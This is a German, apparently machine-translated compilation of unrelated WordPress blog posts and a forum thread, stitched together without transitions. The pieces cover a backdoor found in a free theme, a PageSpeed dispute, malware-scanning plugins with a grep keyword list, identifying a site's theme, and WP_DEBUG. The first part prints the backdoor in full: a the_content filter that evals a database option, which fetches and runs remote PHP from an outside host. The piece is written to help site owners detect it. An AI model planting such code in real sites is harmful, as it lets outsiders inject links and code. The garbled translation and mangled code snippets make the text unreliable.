Hallo Freunde. Sind Sie sicher, dass die kostenlose WordPress-Vorlage, die Sie für Ihre Websites und Blogs verwenden, wirklich sicher ist und keine versteckten Bedrohungen oder bösartigen Code enthält? Bist du dir da völlig sicher? Absolut?)

Sie denken, Sie haben die Vorlage durchlaufen, versteckte Links daraus entfernt und die Arbeit ist erledigt. Sie scannen die Dateien der Website regelmäßig mit einem Antivirenprogramm, werfen einen Blick in die Yandex-Webmaster-Tools auf der Registerkarte „Sicherheit“ und sind erleichtert, die Meldung dort zu sehen: „ Auf der Website wurde kein Schadcode entdeckt«.

Das habe ich mir auch gedacht. Ich möchte dich nicht verärgern, aber...

Versteckter gefährlicher Code in kostenlosen WordPress-Vorlagen

Dies ist der Brief, den ich letzte Woche per E-Mail von meinem Hosting-Unternehmen erhalten habe. Vor kurzem haben sie eine regelmäßige Überprüfung aller Website-Dateien auf schädliche Inhalte eingeführt, und sie haben diese Inhalte tatsächlich bei mir gefunden!

Alles begann, als ich eines Nachmittags meine Website besuchte und sie nicht starten konnte – eine beleidigende Meldung erschien, dass Dateien mit der PHP-Erweiterung nicht gefunden wurden. Nachdem ich mich ein wenig angespannt hatte, untersuchte ich den Inhalt des Ordners mit der Site auf dem Hosting und entdeckte sofort ein Problem: Meine Vorlagendatei fuctions.php wurde in „functions.php.malware“ umbenannt, was mehrdeutig darauf hinzudeuten schien, dass es sich um ein Antivirenprogramm handelte Ich arbeite hier oder so ähnlich.) Nachdem ich zur Post gegangen war, fand ich den obigen Bericht des Hosters.

Das erste, was ich tat, war natürlich, diese Datei zu überprüfen, ihren Inhalt zu studieren, sie mit allen möglichen Antivirenprogrammen, Dutzenden von Online-Virenprüfdiensten usw. zu scannen. — Am Ende wurde nichts gefunden, alle waren sich einig, dass die Datei absolut sicher sei. Natürlich habe ich dem Hoster gegenüber meine Zweifel geäußert und gesagt, dass Sie etwas vermasselt hätten, aber für alle Fälle habe ich ihn gebeten, einen Bericht über die Entdeckung eines bösartigen Codestücks vorzulegen.

Und das haben sie mir geantwortet

Ich habe bei Google nach Informationen zu diesem Code gesucht und ernsthaft darüber nachgedacht ...

So finden Sie einen Schadcode in einer Vorlage

Wie sich herausstellt, handelt es sich hierbei um eine wirklich nicht triviale Technik, die es interessierten Parteien ermöglicht, ohne Ihr Wissen Daten an Ihre Website zu übermitteln und den Inhalt von Seiten zu ändern! Wenn Sie eine kostenlose Vorlage verwenden, dann Ich empfehle dringend, die Datei „functions.php“ auf den folgenden Code zu überprüfen:

add_filter('the_content', '_bloginfo', 10001);
Funktion _bloginfo($content)(
globaler $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false)(
return $co;
) sonst return $content;
}

Selbst mit meinen sehr oberflächlichen PHP-Kenntnissen ist es klar, dass ein bestimmter Filter erstellt wird, der an die globalen Variablen „post“ und „content“ gebunden ist, die dafür verantwortlich sind, Inhalte nur auf Blog-Post-Seiten anzuzeigen (die is_single-Bedingung). Schon verdächtig, nicht wahr? Nun wollen wir sehen, was dieser Code auf unserer Website anzeigen wird.

Die in der Datenbank angeforderte interessante Option blogoption sieht ebenfalls sehr verdächtig aus. Wir gehen in unsere MySQL-Datenbank und finden dort eine Tabelle namens wp_options. Wenn Sie die Präfixe nicht geändert haben, sieht sie standardmäßig so aus. Und darin finden wir die Zeile, die uns interessiert, namens blogoption

Was für eine Schönheit! Wir sehen die folgende Option

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Diese. Von einer bestimmten Website (und wohlgemerkt einer russischen) werden Inhalte zurückgegeben, die alles enthalten können! Beliebig viele Links, Schadcodes, veränderte Texte usw. Wenn Sie auf die Website selbst zugreifen, erhalten Sie einen 403-Zugriffsfehler, was nicht überraschend ist. Natürlich habe ich diese Option auch aus der Datenbank entfernt.

Nach Angaben von Opfern wird der genaue Inhalt Ihres Artikels in der Regel mit nur einer Änderung zurückgegeben – anstelle eines Punktes „.“ Im Text wurde ein offener Link versteckt! Übrigens wird diese Option bei der Installation der Vorlage selbst in die Datenbank geschrieben, und der Code, der dies tut, zerstört sich dann erfolgreich selbst. Und ich habe zwei Jahre lang mit solch einem Müll gelebt, und in dieser ganzen Zeit hat kein einziges Antivirenprogramm oder Dienst diese Bedrohung für mich erkannt. Um ehrlich zu sein, habe ich nicht bemerkt, ob dieser Trick jemals bei mir funktioniert hat oder ob mein Sicherheits-Plugin diese Funktion blockiert hat (oder vielleicht eines der WordPress-Updates diese Lücke geschlossen hat), aber es ist trotzdem unangenehm.

Moral über kostenlosen Käse

Wie gefällt Ihnen die Raffinesse unserer „Übersetzer“ von Vorlagen (oder derjenigen, die sie in ihren Katalogen veröffentlichen)? Es ist nicht Ihre Aufgabe, Links aus der Fußzeile herauszuschneiden.) Schade, dass ich mich nicht mehr erinnern kann, wo ich meine Vorlage heruntergeladen habe, das ist schon lange her, sonst hätte ich auf jeden Fall ein paar liebevolle Links geschrieben. Und wenn ich damals die gleichen Erfahrungen gemacht hätte wie jetzt, hätte ich definitiv keine kostenlose Vorlage verwendet oder sie im Extremfall nicht von unbekannten Quellen heruntergeladen!

Es ist einfacher, ein offizielles Premium-Template für 15 bis 20 Dollar zu kaufen und in Frieden zu leben, mit dem Wissen, dass es keine Lücken oder verschlüsselten Links enthält, und selbst wenn es Schwachstellen gibt, werden die Entwickler auf jeden Fall ein Update veröffentlichen, in dem diese Lücken enthalten sein werden geschlossen. ( Übrigens hat Artem kürzlich einen Artikel veröffentlicht, in dem er über Premium-Vorlagen spricht und sogar Aktionscodes für brutale Rabatte an Interessierte verteilt)

• Verschwenden Sie nicht einmal Ihre Zeit mit Googlefaker.

  Das Tool von Google kann trotz aller Mängel Dinge tun, die andere nicht können – beispielsweise erkennen, dass Bilder auf einer Website nicht in der richtigen Größe angezeigt werden. Dabei wird ein 1000x1000-Bild als 100x100-Miniatur angezeigt, die vom Browser auf 100x100 komprimiert wurde.

  Ich habe buchstäblich erst neulich einen krummen Kundenthread zu genau diesem Problem behoben. dort wurden in der Seitenleiste 110x82-Miniaturen angezeigt – dort waren aber Originalbilder in Originalgröße vollgestopft.

  Und welches andere Tool zeigt Ihnen, dass Ihre Bilder nicht sehr optimiert sind? Wann eine PNG-Datei ohne Qualitätsverlust von 500 KB auf 45 KB komprimiert werden kann – das ist eine sehr wichtige Information.

  Nun, warum raten Sie wieder Unsinn?

  Zeigen Sie mir jetzt, welches andere Tool solche offensichtlichen Website-Probleme identifizieren kann?

  
  
  

  https://i.imgur.com/tOZcemv.jpg
  https://i.imgur.com/fEarWYT.jpg
  usw. Ich hoffe, das reicht.

  Flector Wenn Sie normale Tools verwenden würden (und nicht verschiedene Google-Fälschungen konsumieren würden), gäbe es diese Fragen einfach nicht.
  Alle oben genannten Informationen liefern drei Größenordnungen mehr und nützlicher als dieser Google-Fake. Wirklich notwendige und nützliche Informationen.

  Alle oben genannten Informationen liefern drei Größenordnungen mehr und nützlicher als dieser Google-Fake. Wirklich notwendige und nützliche Informationen.

  Ich mag das Tool von Google nicht, schon allein deshalb, weil sich die eigenen Dienste nicht daran orientieren. aber er zeigt offensichtliche Dinge wie Bilder perfekt. Nun, es gibt auch gzip, Browser-Caching usw. – das ist das Offensichtlichste.

  und ich schaue lieber bei Google, da nur die Einschätzung zählt. Welchen Unterschied macht es, was Drittanbieterdienste anzeigen, wenn Google sich weiterhin an seiner eigenen Einschätzung orientiert?

  Überprüfen Sie Ihres, um zu sehen, wo die Bilder falsch eingefügt sind. Welche Probleme?
  Es fiel mir schwer, etwas Ähnliches zu finden, von dem ich Screenshots machen konnte.

  denn nur seine Einschätzung ist wichtig.

  Wen interessiert das? Sag das einfach Google nicht :)

  Ja, Beurteilung. 100/100 zu erreichen ist kein Problem. Aber das ist eine Katastrophe für die Seite.
  
  

  Ja, Beurteilung. 100/100 erreichen - kein Problem. Aber das ist eine Katastrophe für die Seite.

  Nun, Sie haben Google einen 503-Fehler gemeldet, wozu?
  das ist keine Lösung des Problems.

  Und ja – die Bewertung von Google ist wichtig.
  Ich weiß nicht in welchem ​​Ausmaß, sie geben solche Zahlen nicht bekannt – aber es wäre doch dumm, einen Dienst anzubieten, von dem nichts abhängt, oder?

  PS: Und auch wenn Google sich nicht um die eigene Bewertung kümmert, ist dies in erster Linie für den Webmaster selbst notwendig und nicht für Google. Wenn der Webmaster GZIP nicht aktiviert hat, Browser-Caching und Bilder nicht die richtige Größe haben, muss dies korrigiert werden.

  und es besteht keine Notwendigkeit, etwas zu reparieren, das Google nicht für wichtig hält (ich spreche von Bewertungen anderer Dienste) – es wäre nur Zeitverschwendung.

  Und ja – die Bewertung von Google ist wichtig.

  Lernen Sie immer noch, die Ergebnisse zu analysieren.

  Aber es wäre dumm, einen Dienst anzubieten, von dem nichts abhängt, nicht wahr?

  Ich verrate Ihnen ein schreckliches Geheimnis: Google-Dienste (und nicht nur Google) sind schon lange nicht mehr für Menschen gemacht. Wie viele Dienste desselben Google sind in Vergessenheit geraten? Wie viel war wirklich nützlich und verschwand dann? Die Zeiten, in denen Google Dinge für Menschen tat, sind längst vorbei. Bigdata, ja.

  dies ist in erster Linie für den Webmaster selbst notwendig,

  Es gibt wirklich nützliche und notwendige Dinge für einen Webmaster. Es hat keinen Sinn, Zeit mit irgendwelchem ​​Müll zu verschwenden. (Falls Sie es noch nicht bemerkt haben, werden dort auch Google-Papageien angezeigt.)

  Was für eine magische Ausrede – lernen Sie, die Ergebnisse zu analysieren.
  

  ok – ich antworte dir auch – lerne, die Ergebnisse zu analysieren. Wenn alle anderen Faktoren gleich sind (absolut identische Ranking-Faktoren – von Links bis PF), wird die Website mit der höchsten Bewertung von Google an erster Stelle in den Suchergebnissen stehen.

  Glaubst du mir nicht? Nun ja, du hast recht.
  Es ist immer noch nicht möglich, so etwas zu testen – es gibt keine gleichwertigen Websites.

  Das spielt auf jeden Fall keine Rolle – denn die Optimierung erfolgt nicht so sehr für Google, sondern für die eigenen Besucher. wie bei den gleichen Bildern, wenn der Webmaster ein 5 MB großes Bild als Miniaturansicht einfügt.

  worum geht es dann?

  In der „Wichtigkeit“ von Google-Papageien.

  Was für eine magische Ausrede – lernen Sie, die Ergebnisse zu analysieren.
  ein direktes Argument für alle Gelegenheiten.

  Wenn Sie etwas über die PS sagen, ist die Ausstellung der einzig wahre Beweis.

  Es wird immer noch nicht möglich sein, so etwas zu testen – es gibt keine gleichwertigen Seiten.

  Warum sind sie unterschiedlich? Sie können bei Google nicht einmal nach Websites suchen, die in den Suchergebnissen aufgeführt sind? Es gibt 50 und sogar 30, die ganz in den TOP10 liegen.

  Es ist nur einer von Tausenden Ranking-Faktoren. Deshalb habe ich von „gleichen“ (nicht unterschiedlichen) Websites gesprochen – nur in diesem Fall können Sie sicher sein, dass Google-Papageien funktionieren.

  Facebook mag zwar eine „0“-Bewertung für Google-Papageien haben – bei der Suchanfrage „Facebook“ wird es aber immer noch TOP1 sein. Es ist irgendwie offensichtlich.

  Google PageSpeed ​​​​Insights hat nur ein Plus – eine separate Analyse der Suchergebnisse für Desktop und Mobil, sonst ist es so schlimm wie eine immer unzufriedene, mürrische Frau 😀 Unterschätzt, findet Fehler an dem, was nicht korrigiert werden kann (Ressourcen aus anderen Domains, einschließlich der dasselbe Google)
  Es gibt viele Analoga; viele Dienste analysieren Website-Konfigurationsprobleme,
  Ich habe am Anfang des Themas bewusst auf einen Link zu Pingdom verzichtet, da mir Webpagetest beispielsweise besser gefällt, der einzige Unterschied besteht in der Form, der Darstellung des Ergebnisses und der subjektiven Bequemlichkeit.
  Viele Leute finden auch schlecht komprimierte Bilder. Die einzige Frage ist, 10 Papageien abzuwerfen und zu sagen, dass die Bilder auf Ihrer Website aufgrund des Unterschieds von 1 Byte überhaupt nicht optimiert sind ...
  Nehmen Sie das gleiche GTMetrix, es gibt eine Bewertung basierend auf dem PageSpeed-Algorithmus und Yslow,
  Darüber hinaus kann eine Website mit 95 % PageSpeed ​​​​unoptimiert bei Insights „ganz unten“ sein, das ist wirklich ihr Problem und sie machen anderen Probleme, insbesondere denen, die die Bedeutung von Bewertungen und Ergebnissen nicht analysieren können.
  Die Seite ist gut, optimiert, aber auf G PS I – „oh, alles ist schlecht“

  Glauben Sie wirklich, dass dieselben „Google-Papageien“ der wichtigste Rankingfaktor der Welt sind?

  Ich glaube, das sind Papageien. Sie liefern keine nützlichen Daten. Und es gibt keinerlei Auswirkungen auf die Ladegeschwindigkeit (welche Art von Pagespeed? Schon der Name des Dienstes ist eine Fälschung). Die Geschwindigkeit wird nicht in Google-Papageien gemessen, sondern in Bits/Sekunde.
  Was das Ranking betrifft: Wenn die Websites in den TOP10 30 Google-Papageien haben, welchen Sinn haben sie dann überhaupt?
  So ähnlich.

  Nur in diesem Fall können Sie sicher sein, dass Google Papageien funktionieren.

  Es sind NICHT Papageien, die funktionieren, sondern alle Faktoren. 90 % davon sind nicht in dieser Fälschung enthalten, und 90 % von dem, was drin ist, ist Blödsinn.
  Der einzige Vorteil für den Lamer besteht darin, dass Sie optimierte Grafiken herunterladen können. Aber nur Grafiken, keine Stile und Skripte.

• Das Thema „Überprüfen einer Website auf Fehler“ ist für neue Antworten geschlossen.

WordPress ist die beliebteste Engine zum Erstellen verschiedener Informationswebsites und Blogs. Die Sicherheit Ihrer Website geht über die Sicherheit Ihrer Daten hinaus. Dies ist viel wichtiger, denn es dient auch der Sicherheit aller Benutzer, die Ihre Ressource lesen und ihnen vertrauen. Aus diesem Grund ist es so wichtig, dass die Website nicht mit Viren oder anderem Schadcode infiziert ist.

Wir werden uns in einem der folgenden Artikel damit befassen, wie Sie WordPress vor Hackerangriffen schützen können, aber jetzt möchte ich Ihnen erklären, wie Sie eine WordPress-Website auf Viren und Schadcode überprüfen, um sicherzustellen, dass alles sicher ist.

Die allererste Option, die mir in den Sinn kommt, ist, dass Sie von Hackern gehackt wurden und ihre Hintertüren in den Code Ihrer Website eingebaut haben, um Spam versenden, Links setzen und andere schlechte Dinge tun zu können. Das kommt manchmal vor, ist aber ein eher seltener Fall, wenn Sie die Software rechtzeitig aktualisieren.

Es gibt Tausende kostenloser WordPress-Themes und verschiedener Plugins, und das könnte bereits eine Bedrohung darstellen. Es ist eine Sache, wenn Sie eine Vorlage von der WordPress-Site herunterladen, und eine ganz andere, wenn Sie sie auf der linken Site finden. Skrupellose Entwickler können verschiedene Schadcodes in ihre Produkte einbetten. Das Risiko ist sogar noch größer, wenn Sie Premium-Vorlagen kostenlos herunterladen, bei denen Hacker, ohne etwas zu riskieren, eine Art Sicherheitslücke hinzufügen können, durch die sie dann eindringen und tun können, was sie brauchen. Aus diesem Grund ist es so wichtig, eine WordPress-Site auf Viren zu überprüfen.

Überprüfen einer WordPress-Site auf Viren

Das erste, worauf Sie bei der Überprüfung einer Website achten müssen, sind keine Viren, sondern WordPress-Plugins. Sie können Ihre Website schnell und einfach scannen und verdächtige Codebereiche finden, die es wert sind, beachtet zu werden, sei es im Theme, Plugin oder im Wodpress-Kern selbst. Schauen wir uns einige der beliebtesten Plugins an:

1. Inhaltsverzeichnis

Dieses sehr einfache Plugin überprüft alle auf Ihrer Website installierten Themes, um festzustellen, ob sie schädlichen Code enthalten. Das Plugin erkennt versteckte Links, die durch Base64-Code-Einfügung verschlüsselt wurden, und zeigt außerdem detaillierte Informationen zu den gefundenen Problemen an. In den meisten Fällen handelt es sich bei den gefundenen Codeteilen nicht um Viren, sie können jedoch potenziell gefährlich sein, weshalb Sie auf sie achten sollten.

Offen "Aussehen" -> „TAC“ Warten Sie dann, bis alle Themen überprüft sind.

2. VIP-Scanner

Sehr ähnlich dem TOC-Themenscanner, zeigt jedoch detailliertere Informationen an. Dieselben Funktionen zur Erkennung von Links, verstecktem Code und anderen bösartigen Einfügungen. Öffnen Sie einfach den VIP-Scanner-Eintrag im Tools-Bereich und analysieren Sie das Ergebnis.

Es kann ausreichen, unnötige Dateien zu löschen, zum Beispiel die Datei „desktop.ini“. Oder Sie müssen sich genauer ansehen, was in Dateien mit base64 passiert.

3. Anti-Malware von GOTMLS.NET

Mit diesem Plugin können Sie nicht nur die Themes und den Kern der Site auf Viren scannen, sondern die Site auch vor Brute-Force-Passwörtern und verschiedenen XSS- und SQLInj-Angriffen schützen. Die Suche erfolgt auf Basis bekannter Signaturen und Schwachstellen. Einige Schwachstellen können vor Ort behoben werden. Um mit dem Scannen von Dateien zu beginnen, öffnen Sie „Anti-Malvare“ im Seitenmenü und klicken Sie auf „Scan ausführen“:

Bevor Sie einen Scan durchführen können, müssen Sie Ihre Signaturdatenbanken aktualisieren.

4. Wordfence

Dies ist eines der beliebtesten Plugins für WordPress-Sicherheit und Malware-Scanning. Neben dem Scanner, der die meisten Lesezeichen im WordPress-Code finden kann, gibt es einen ständigen Schutz vor verschiedenen Arten von Angriffen und Passwort-Brute-Force. Bei der Suche findet das Plugin mögliche Probleme mit verschiedenen Plugins und Themes und meldet die Notwendigkeit einer Aktualisierung von WordPress.

Öffnen Sie die Registerkarte „WPDefence“ im Seitenmenü und gehen Sie dann auf die Registerkarte "Scan" und drücke "Scan starten":

Der Scan kann einige Zeit dauern, aber wenn er abgeschlossen ist, wird Ihnen ein detaillierter Bericht der gefundenen Probleme angezeigt.

5. AntiVirus

Dies ist ein weiteres einfaches Plugin, das Ihre Website-Vorlage nach bösartigem Code durchsucht. Der Nachteil besteht darin, dass nur die aktuelle Vorlage gescannt wird, die Informationen jedoch ausreichend detailliert angezeigt werden. Sie sehen alle gefährlichen Funktionen, die im Theme enthalten sind, und können dann im Detail analysieren, ob von ihnen eine Gefahr ausgeht. Finden Sie einen Artikel „AntiVirus“ in den Einstellungen und klicken Sie dann auf „Jetzt die Theme-Vorlagen scannen“:

6. Integritätsprüfer

Es ist auch ratsam, die Integrität von WordPress-Dateien zu überprüfen, falls der Virus bereits irgendwo geschrieben hat. Sie können hierfür das Integrity Checker-Plugin verwenden. Es überprüft alle Kern-, Plugin- und Vorlagendateien auf Änderungen. Am Ende des Scans sehen Sie Informationen zu den geänderten Dateien.

Online Dienste

Es gibt auch mehrere Online-Dienste, mit denen Sie eine WordPress-Site auf Viren überprüfen oder nur die Vorlage überprüfen können. Hier sind einige davon:

themecheck.org- Sie laden das Theme-Archiv herunter und können alle Warnungen zu möglichen schädlichen Funktionen sehen, die darin verwendet werden. Sie können nicht nur Informationen zu Ihrem Theme anzeigen, sondern auch zu anderen Themes, die von anderen Benutzern hochgeladen wurden, sowie zu verschiedenen Versionen des Themes. Was auch immer die Plugins finden, finden Sie auf dieser Website. Die Überprüfung Ihres WordPress-Themes ist ebenfalls sehr wichtig.

virustotal.com– eine bekannte Ressource, mit der Sie Ihre Website oder Vorlagendatei auf Viren überprüfen können.

ReScan.pro- Das Scannen einer WordPress-Site auf Viren mithilfe dieses Dienstes ist kostenlos; es werden statische und dynamische Analysen durchgeführt, um mögliche Weiterleitungen zu erkennen; der Scanner öffnet die Seiten der Site. Prüft die Website anhand verschiedener Blacklists.

sitecheck.sucuri.net- ein einfacher Dienst zum Scannen von Websites und Themen auf Viren. Es gibt ein Plugin für WordPress. Erkennt gefährliche Links und Skripte.

Manuelle Prüfung

Nichts kann besser sein als die manuelle Überprüfung. Linux verfügt über dieses wunderbare grep-Dienstprogramm, mit dem Sie nach Vorkommen beliebiger Zeichenfolgen in einem Ordner mit Dateien suchen können. Es bleibt abzuwarten, wonach wir suchen werden:

eval – Mit dieser Funktion können Sie beliebigen PHP-Code ausführen. Sie wird nicht von Produkten mit Selbstachtung verwendet. Wenn eines der Plugins oder eines Themes diese Funktion verwendet, besteht eine fast 100-prozentige Wahrscheinlichkeit, dass es einen Virus enthält.

• base64_decode- Verschlüsselungsfunktionen können in Verbindung mit eval verwendet werden, um bösartigen Code zu verbergen, sie können aber auch für friedliche Zwecke verwendet werden, seien Sie also vorsichtig;
• sha1- eine andere Methode zur Verschlüsselung von Schadcode;
• gzinflate- Komprimierungsfunktion, gleiche Ziele, zusammen mit eval, zum Beispiel gzinflate(base64_decode(code);
• strrev- dreht die Zeile nicht um, bevor sie als Option zur primitiven Verschlüsselung verwendet werden kann;
• drucken- gibt Informationen an den Browser aus, zusammen mit gzinflate oder base64_decode ist es gefährlich;
• file_put_contents- WordPress selbst oder Plugins können immer noch Dateien im Dateisystem erstellen, aber wenn das Theme dies tut, sollten Sie vorsichtig sein und prüfen, warum es das tut, da Viren installiert werden können;
• file_get_contents– wird in den meisten Fällen zu friedlichen Zwecken verwendet, kann aber zum Herunterladen von Schadcode oder zum Lesen von Informationen aus Dateien verwendet werden;
• Locken- die selbe Geschichte;
• fopen- öffnet eine Datei zum Schreiben, man weiß nie zu welchem ​​Zweck;
• System- Die Funktion führt einen Befehl auf einem Linux-System aus. Wenn ein Theme, ein Plugin oder WordPress selbst dies tut, befindet sich dort höchstwahrscheinlich ein Virus;
• Symlink- Erstellt symbolische Links im System. Möglicherweise versucht der Virus, das Hauptdateisystem von außen zugänglich zu machen.
• Kopieren- kopiert eine Datei von einem Ort zum anderen;
• getcwd- gibt den Namen des aktuellen Arbeitsverzeichnisses zurück;
• cwd- ändert den aktuellen Arbeitsordner;
• ini_get- erhält Informationen über PHP-Einstellungen, oft zu friedlichen Zwecken, aber man weiß nie;
• error_reporting(0)- deaktiviert die Ausgabe etwaiger Fehlermeldungen;
• window.top.location.href- Javascript-Funktion für Weiterleitungen zu anderen Seiten;
• gehackt- Also, nur für den Fall, wir überprüfen, plötzlich beschloss der Hacker selbst, es uns zu sagen.

Sie können jedes einzelne Wort wie folgt in einen Befehl einsetzen:

grep -R „gehackt“ /var/www/path/to/files/wordpress/wp-content/

Oder verwenden Sie ein einfaches Skript, das nach allen Wörtern auf einmal sucht:

Werte="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
Kopieren(
auswerten(
System(
Symlink(
error_reporting(0)
drucken
file_get_contents(
file_put_contents(
fopen(
gehackt“

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *

Haben Sie sich jemals gefragt, welches Thema eine Website verwendet?

Auf der Suche nach dem idealen Thema schauen wir uns oft andere abgeschlossene Projekte an, um etwas Ähnliches zu finden oder eine eigene Website zum gleichen Thema zu erstellen, nur mit unserem eigenen individuellen Design.

In diesem Tutorial zeigen wir Ihnen, mit welchen Tools und Tricks Sie herausfinden können, welches Theme Ihre WordPress-Site verwendet.

Methode 1. IsItWP-Verifizierungsseite

Der einfachste Weg ist, auf isitwp.com zu gehen und sich die Seite anzusehen, die Sie interessiert.

Dies ist ein Online-Tool, das Ihnen zeigt, welches Theme WordPress verwendet und ob WordPress überhaupt auf dieser Website verwendet wird.

Wenn auf der Website WordPress ausgeführt wird, versucht IsItWP, den Namen des aktuellen Themes herauszufinden.

Außerdem wird versucht herauszufinden, welche aktiven Plugins auf der Website verwendet werden:

Wenn Sie Glück haben und es sich nicht um ein benutzerdefiniertes oder untergeordnetes Thema handelt, zeigt IsItWP seinen Namen an und Sie können dieses Thema dann in Suchmaschinen finden.

Methode 2. Manuell bestimmen

Manchmal ändern Websitebesitzer oder Entwickler den Namen eines nativen WordPress-Themes. In diesem Fall können Ihnen Tools wie IsItWP nicht weiterhelfen.

Aber selbst wenn dies der Fall ist, enthält der Site-Code möglicherweise noch verschiedene Hinweise, anhand derer Sie herausfinden können, welche Art von Theme installiert ist.

Werfen wir einen Blick darauf.

Jedes WordPress-Theme muss eine Datei haben style.css. Diese Datei enthält einen Header, der normalerweise den Namen des Themes, den Autor des Themes, die Version und die Site des Theme-Entwicklers angibt. Außerdem werden andere CSS-Stilvorlagen aufgelistet, die das Theme verwendet.

Um diese Datei zu finden, müssen Sie zunächst die Website selbst aufrufen. Klicken Sie mit der rechten Maustaste irgendwo auf die Hauptseite und gehen Sie zur Ansicht des Quellcodes ( Seitenquelle anzeigen).

Der Quellcode der Hauptseite der Website wird im Browser in einem neuen Tab geöffnet.

Jetzt müssen Sie eine Codezeile finden, die etwa so aussieht:

Um die Aufgabe zu erleichtern, können Sie diese Registerkarte mit dem Code nach dem Fragment durchsuchen. Themen". Dies ist ein Teil aus dem Verzeichnis, in dem style.css.

Auf diese Weise finden Sie den Pfad, in dem sich die Datei style.css befindet, und können diese Datei direkt im Browser in einem neuen Tab öffnen.

Oben in style.css befindet sich eine Kopfzeile mit einem Titel (über den wir oben gesprochen haben). Dies sind Serviceinformationen zum Thema. Es sieht ungefähr so ​​aus:

/* Theme-Name: Theme-Name Theme-URI: https://example.com Autor: ThemeAuthorName Autor-URI: https://example.com Beschreibung: My Theme ist ein flexibles WordPress-Theme, das für Portfolio-Websites entwickelt wurde. Version: 1.1.47 Lizenz: GNU General Public License v2 oder höher Lizenz-URI: http://www.gnu.org/licenses/gpl-2.0.html Textdomäne: hestia Tags: Blog, benutzerdefiniertes Logo, Portfolio, E-Commerce, RTL-Sprachunterstützung , Postformate, Rasterlayout, einspaltig, zweispaltig, benutzerdefinierter Hintergrund, benutzerdefinierte Farben, benutzerdefinierter Header, benutzerdefiniertes Menü, vorgestellter Bild-Header, vorgestellte Bilder, flexibler Header, volle Breite -template, Sticky-Post, Theme-Optionen, Thread-Kommentare, übersetzungsbereit */

In diesem Block erfahren Sie den Namen des Themas und die Adresse des Entwicklers. Dann bleibt nur noch, dieses Thema im Internet zu finden.

Methode 3. So finden Sie das übergeordnete Thema

Viele Websites verwenden untergeordnete Themen, um ihr Erscheinungsbild anzupassen. Und das ist ein völlig richtiger Ansatz.

In diesem Fall, wenn Sie die Datei gefunden haben style.css Bei einem untergeordneten Thema enthält der Header Informationen zum übergeordneten Thema:

/* Themenname: My Child Theme Beschreibung: Nur ein Kinderthema Autor: Peter Smith Autoren-URL: Schreiben Sie hier die Blog- oder Website-URL des Autors Vorlage: hestia Version: 1.0 Lizenz: GNU General Public License v2 oder höher Lizenz-URI: http :/ /www.gnu.org/licenses/gpl-2.0.html Textdomäne: my-child-theme */

Im obigen Beispiel wird das übergeordnete Thema durch den Parameter „ Vorlage", was bedeutet, dass dieses untergeordnete Thema das übergeordnete Thema „Hestia“ verwendet.

Sie können das übergeordnete Thema auch anhand des in Methode 2 beschriebenen Quellcodes kennenlernen. Im Code finden Sie einen Verweis auf die Datei style.css nicht nur vom untergeordneten Thema, sondern auch vom übergeordneten Thema.

Vergessen Sie jedoch nicht, dass der Entwickler versuchen könnte, alle Header für style.css in seine eigenen zu ändern. In diesem Fall wäre es sehr schwierig, das ursprüngliche Thema zu bestimmen.

Hallo zusammen! Die Zeit steht nicht still und jedes Mal erscheinen neue Funktionen im Kernel. Mussten damals die meisten nicht standardmäßigen Aufgaben durch zusätzliche Programmierung umgesetzt werden, so ändert sich die Situation jetzt. Es gibt einen klaren Trend, die Funktionalität sofort zu erweitern.

Wenn ich auf das Jahr 2010 zurückblicke, als ich an der Schwelle zu Entdeckungen stand und erstmals Bekanntschaft mit machte, erinnere ich mich daran, wie schwierig es für mich war, meine ersten Schritte zu machen. Für jede elementare Aufgabe habe ich Plugins gefunden und installiert; ihre Gesamtzahl könnte mehrere Dutzend erreichen! 😮 Dann kam die Zeit des Umdenkens und des Strebens nach Minimalismus. Der Abschnitt „Optimierung“ spiegelt einige Aspekte der Arbeit wider, die ich zur Beschleunigung des Blogs geleistet habe.

Aktivieren Sie den WordPress-Debug-Modus

Die Blog-Vorlage hat seit den ersten Tagen Änderungen erfahren und neue Funktionen, Stile und Klassen erhalten. Nachdem es eine kritische Masse erreicht hatte, wurde es schwerfällig – es ist sehr schwierig, die Arbeitskondition und die hohe Produktivität aufrechtzuerhalten. Im vergangenen Jahr gab es große, auf den ersten Blick unsichtbare Veränderungen – vom neuen Layout über die Arbeit mit Miniaturansichten bis hin zum Mikro-Markup.

Das erste, was nach der Transformation zu tun war, war, die Entwicklerkonsole im Browser zu öffnen und nach Fehlern und Warnungen zu suchen. Nächster Schritt - WordPress-Debugging. Der Modus ist in der Konfigurationsdatei wp-config.php aktiviert. Suchen Sie darin die Zeile:

Define("WP_DEBUG" , false );

und ersetzen Sie false durch true . Die Zeile sollte so aussehen:

Define("WP_DEBUG" , true );

Bei Fehlern wird eine Meldung angezeigt, an der der Fehler aufgetreten ist und in der das Problem und die betroffenen Dateien beschrieben werden. Dabei kann es sich um Parsing-Fehler oder veraltete Funktionen handeln, die aus dem Kernel entfernt oder durch neue ersetzt wurden.

Die Warnung basiert auf einer einfachen Tatsache: Die Fehlermeldung enthält den absoluten Pfad zur Datei relativ zum Stammverzeichnis des Servers. Die Nachricht wird nicht nur vom Administrator, sondern von allen Benutzern gesehen. Ein anschauliches Beispiel:

Analysefehler: Syntaxfehler, unerwartetes „endif“ (T_ENDIF) in /u57109403/data/www/site.ru/wp-content/themes/default/index.php in Zeile 23

Wie aus dem Beispiel hervorgeht, kann der Wert u57109403 der Login für den Zugriff auf den Server sein und Angreifer müssen nur das Passwort erraten. Sei vorsichtig.

Theme Check – WordPress-Theme-Testtool

Zusätzlich zur integrierten WP_DEBUG-Funktion gibt es ein gutes Entwicklertool, mit dem Sie Ihr Theme anhand moderner Codex-Standards testen können.

Es ist als Theme-Check-Plugin implementiert, das Sie von der offiziellen Repository-Seite herunterladen können.

Gehen Sie nach der Aktivierung des Plugins zu dessen Seite (Aussehen – Themenprüfung). Wenn der Debugging-Modus deaktiviert ist, wird die folgende Meldung angezeigt:

WARNUNG WP_DEBUG ist nicht aktiviert! Bitte testen Sie Ihr Theme mit aktiviertem Debug, bevor Sie es hochladen!

Wie man diesen Modus aktiviert, habe ich im ersten Teil des Artikels beschrieben. Dies ist nicht notwendig, wird aber zur Vollständigkeit der Analyse dringend empfohlen. Um die Prüfung zu starten, klicken Sie auf „Überprüfen“.

